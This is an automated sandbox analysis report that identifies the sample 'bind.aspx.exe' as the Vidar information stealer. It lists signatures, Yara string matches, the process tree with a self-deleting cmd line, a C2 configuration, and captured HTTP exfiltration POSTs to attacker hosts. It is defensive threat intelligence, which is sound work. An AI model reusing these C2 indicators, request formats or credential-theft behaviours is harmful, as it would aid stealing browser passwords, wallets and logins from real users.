Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bind.aspx.exe

Overview

General Information

Sample name:bind.aspx.exe
Analysis ID:1521042
MD5:9c49281d063296a545c79bf288d4c3bf
SHA1:403babf2b5811ba796517ce45235d261ad858620
SHA256:3a29214c3a66734c4213be2307f42e30568548e4f0493eb246be3cdc1345ceb1
Tags:exeuser-NDA0E
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • bind.aspx.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\bind.aspx.exe" MD5: 9C49281D063296A545C79BF288D4C3BF)
    • cmd.exe (PID: 7980 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8032 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "22857ff23603709764e7e7e3e4fd64bf"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
bind.aspx.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    bind.aspx.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      bind.aspx.exeINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x1c820:$s1: JohnDoe
      • 0x1c828:$s2: HAL9TH
      bind.aspx.exeMALWARE_Win_EXEPWSH_DLAgentDetects SystemBCditekSHen
      • 0x200eb:$pwsh: powershell
      • 0x4aadf8:$s1: GET %s HTTP/1
      • 0x259280:$s4: LdrLoadDll
      • 0x25c1bc:$s4: LdrLoadDll
      • 0x25c43d:$s4: LdrLoadDll
      • 0x25cedf:$s4: LdrLoadDll
      • 0xdbcc0:$v6: start
      • 0xdc96a:$v6: start
      • 0xdf159:$v6: start
      • 0xdf1c9:$v6: start
      • 0xdf4e6:$v6: start
      • 0xdf5c9:$v6: start
      • 0xdf642:$v6: start
      • 0xe02c6:$v6: start
      • 0xe11b7:$v6: start
      • 0xf0460:$v6: start
      • 0xf0477:$v6: start
      • 0xf0493:$v6: start
      • 0xf04ad:$v6: start
      • 0xf97bc:$v6: start
      • 0xfa879:$v6: start

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: bind.aspx.exe PID: 6376JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: bind.aspx.exe PID: 6376JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Process Memory Space: bind.aspx.exe PID: 6376JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.2.bind.aspx.exe.340000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  4.2.bind.aspx.exe.340000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x1c820:$s1: JohnDoe
                  • 0x1c828:$s2: HAL9TH
                  4.2.bind.aspx.exe.340000.0.unpackMALWARE_Win_EXEPWSH_DLAgentDetects SystemBCditekSHen
                  • 0x200eb:$pwsh: powershell
                  • 0x4aadf8:$s1: GET %s HTTP/1
                  • 0x259280:$s4: LdrLoadDll
                  • 0x25c1bc:$s4: LdrLoadDll
                  • 0x25c43d:$s4: LdrLoadDll
                  • 0x25cedf:$s4: LdrLoadDll
                  • 0xdbcc0:$v6: start
                  • 0xdc96a:$v6: start
                  • 0xdf159:$v6: start
                  • 0xdf1c9:$v6: start
                  • 0xdf4e6:$v6: start
                  • 0xdf5c9:$v6: start
                  • 0xdf642:$v6: start
                  • 0xe02c6:$v6: start
                  • 0xe11b7:$v6: start
                  • 0xf0460:$v6: start
                  • 0xf0477:$v6: start
                  • 0xf0493:$v6: start
                  • 0xf04ad:$v6: start
                  • 0xf97bc:$v6: start
                  • 0xfa879:$v6: start
                  4.0.bind.aspx.exe.340000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    4.0.bind.aspx.exe.340000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                    • 0x1c820:$s1: JohnDoe
                    • 0x1c828:$s2: HAL9TH
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-28T03:29:40.788591+020020287653Unknown Traffic192.168.2.749709135.181.31.18443TCP
                    2024-09-28T03:29:42.362925+020020287653Unknown Traffic192.168.2.749710135.181.31.18443TCP
                    2024-09-28T03:29:43.812034+020020287653Unknown Traffic192.168.2.749711135.181.31.18443TCP
                    2024-09-28T03:29:45.267797+020020287653Unknown Traffic192.168.2.749712135.181.31.18443TCP
                    2024-09-28T03:29:46.754710+020020287653Unknown Traffic192.168.2.749713135.181.31.18443TCP
                    2024-09-28T03:29:48.313001+020020287653Unknown Traffic192.168.2.749714135.181.31.18443TCP
                    2024-09-28T03:29:49.305343+020020287653Unknown Traffic192.168.2.749715135.181.31.18443TCP
                    2024-09-28T03:29:50.425961+020020287653Unknown Traffic192.168.2.749716135.181.31.18443TCP
                    2024-09-28T03:29:51.744737+020020287653Unknown Traffic192.168.2.749717135.181.31.18443TCP
                    2024-09-28T03:29:53.368387+020020287653Unknown Traffic192.168.2.749718135.181.31.18443TCP
                    2024-09-28T03:29:54.811226+020020287653Unknown Traffic192.168.2.749719135.181.31.18443TCP
                    2024-09-28T03:29:56.315413+020020287653Unknown Traffic192.168.2.749720135.181.31.18443TCP
                    2024-09-28T03:29:58.709652+020020287653Unknown Traffic192.168.2.749721135.181.31.18443TCP
                    2024-09-28T03:30:00.892970+020020287653Unknown Traffic192.168.2.749722135.181.31.18443TCP
                    2024-09-28T03:30:02.576777+020020287653Unknown Traffic192.168.2.749724135.181.31.18443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-28T03:30:05.277005+020020544951A Network Trojan was detected192.168.2.74972595.164.119.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-28T03:29:46.063893+020020442471Malware Command and Control Activity Detected135.181.31.18443192.168.2.749712TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-28T03:29:47.530135+020020518311Malware Command and Control Activity Detected135.181.31.18443192.168.2.749713TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-28T03:29:47.529852+020020490871A Network Trojan was detected192.168.2.749713135.181.31.18443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: bind.aspx.exeMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "22857ff23603709764e7e7e3e4fd64bf"}
                    Multi AV Scanner detection for submitted file
                    Source: bind.aspx.exeReversingLabs: Detection: 42%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: bind.aspx.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00346AA4 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00346AA4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034F8C3 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,4_2_0034F8C3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00346A41 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00346A41
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003483E8 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,4_2_003483E8
                    Source: bind.aspx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 135.181.31.18:443 -> 192.168.2.7:49709 version: TLS 1.2
                    Source: Binary string: freebl3.pdb source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: mozglue.pdbP source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: freebl3.pdbp source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: nss3.pdb@ source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: softokn3.pdb@ source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: bind.aspx.exe, vcruntime140.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: bind.aspx.exe, msvcp140.dll.4.dr
                    Source: Binary string: nss3.pdb source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: mozglue.pdb source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: softokn3.pdb source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034AAF6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034AAF6
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003538DD wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_003538DD
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003532CD wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_003532CD
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349B56 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00349B56
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034B957 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034B957
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003413B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_003413B4
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00353FEA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00353FEA
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349633 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00349633
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00353C2D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00353C2D
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034A2AF wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0034A2AF
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00349305 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_00349305
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003536A9 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_003536A9
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49725 -> 95.164.119.162:80
                    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49713 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 135.181.31.18:443 -> 192.168.2.7:49713
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 135.181.31.18:443 -> 192.168.2.7:49712
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199761128941
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 95.164.119.162 95.164.119.162
                    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                    Source: Joe Sandbox ViewASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49715 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49721 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49720 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49714 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49716 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49709 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49713 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49711 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49719 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49717 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49718 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49712 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49722 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49710 -> 135.181.31.18:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49724 -> 135.181.31.18:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 8197Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 129565Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: stadiatechnologies.comContent-Length: 2653Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
